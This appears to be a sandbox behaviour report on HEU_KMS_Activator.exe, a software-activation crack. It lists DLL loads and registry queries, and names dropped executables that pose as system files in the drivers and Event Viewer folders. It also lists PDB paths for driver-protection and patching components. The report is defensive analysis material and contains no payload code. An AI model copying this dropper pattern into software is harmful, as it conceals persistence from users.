Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: npmproxy.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usosvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: updatepolicy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\ScriptTemp.iniJump to behavior
Source: C:\Windows\_temp07242019502489\kms_x64.exeWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\_temp07242019502489\kms_x64.exeWindow detected: Number of UI elements: 15
Source: HEU_KMS_Activator.exeStatic file information: File size 5596080 > 1048576
Source: C:\Windows\_temp07242019502489\7Z.EXEFile opened: C:\Windows\_temp07242019502489\x86\msvcr100.dll
Source: Binary string: msvcr100.amd64.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, msvcr100.dll0.34.dr
Source: Binary string: F:\20201028P\KMDF_Protect\Release\KMDF_Protect_64.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wuhost.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, wuhost.exe.1.dr
Source: Binary string: W:\SECOPatcher\temp\Release\Win32\SECOPatcher\SECOPatcher.pdb source: 7Z.EXE, 00000022.00000003.1322653977.0000000000750000.00000004.00001000.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, SECOPatcher.dll.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\DvLayout.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, DvLayout.exe, 0000000B.00000000.1267571184.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe, 0000000B.00000002.1275429257.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe.1.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb@F source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe0.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\DvLayout.pdb9 source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, DvLayout.exe, 0000000B.00000000.1267571184.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe, 0000000B.00000002.1275429257.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe.1.dr
Source: Binary string: Q:\christoh\Projects\KMS-HGM\Release\KMS-Client.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, kms-client.exe.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wdlogin.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: )}D:\Office\Target\x64\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Office\Target\x86\ship\licensing\x-none\CleanO15SPP.pdb4U source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe.34.dr
Source: Binary string: msvcr100.i386.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, msvcr100.dll.34.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe0.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wrme.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.dr
